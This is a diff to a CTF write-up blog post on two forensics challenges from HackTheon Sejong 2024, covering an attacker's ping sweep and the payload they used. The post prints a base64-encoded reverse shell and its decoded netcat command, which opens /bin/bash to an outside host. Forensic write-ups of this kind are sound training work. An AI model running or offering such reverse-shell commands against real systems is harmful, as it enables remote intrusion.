warlocksmurf/warlocksmurf.github.io/_posts/2024-04-27-hacktheonsejongctf2024.md

 ![three](/assets/posts/hacktheonsejongctf2024/three.png)

 ## Rumor 3 [Forensics]
-Question: I've heard rumors that it's possible to analyze an accident using just a single file. please find the answers to the following questions.
+**Question:** I've heard rumors that it's possible to analyze an accident using just a single file. please find the answers to the following questions.
 What is the network band scanned by the attacker for additional infections?
 Example: xxx.xxx.xxx.0/36

-Flag: `192.168.100.0/24`
+**Flag:** `192.168.100.0/24`

 Following the timeline, we can see the attacker running a Python script that pings a range of IP addresses after compromising the machine.
-The range was 192.168.100.1 to 192.168.100.255.
+The range was `192.168.100.1 - 192.168.100.255`.

 ![four](/assets/posts/hacktheonsejongctf2024/four.png)

 ## Rumor 4 [Forensics]
-Question: I've heard rumors that it's possible to analyze an accident using just a single file. please find the answers to the following questions.
+**Question:** I've heard rumors that it's possible to analyze an accident using just a single file. please find the answers to the following questions.
 What attack payload did the attacker use for the network-linked daemon on the server after the network scan? (reverse shell)

-Flag: `bmMgMTkyLjE2OC4xMDAuMzIgNTQ1NCAtZSAvYmluL2Jhc2g=====`
+**Flag:** `bmMgMTkyLjE2OC4xMDAuMzIgNTQ1NCAtZSAvYmluL2Jhc2g=====`

 Similarly, following the timeline shows that an encoded payload was executed after enumerating the network.
 The decoded payload can be identified as `nc 192.168.100.32 5454 -e /bin/bash`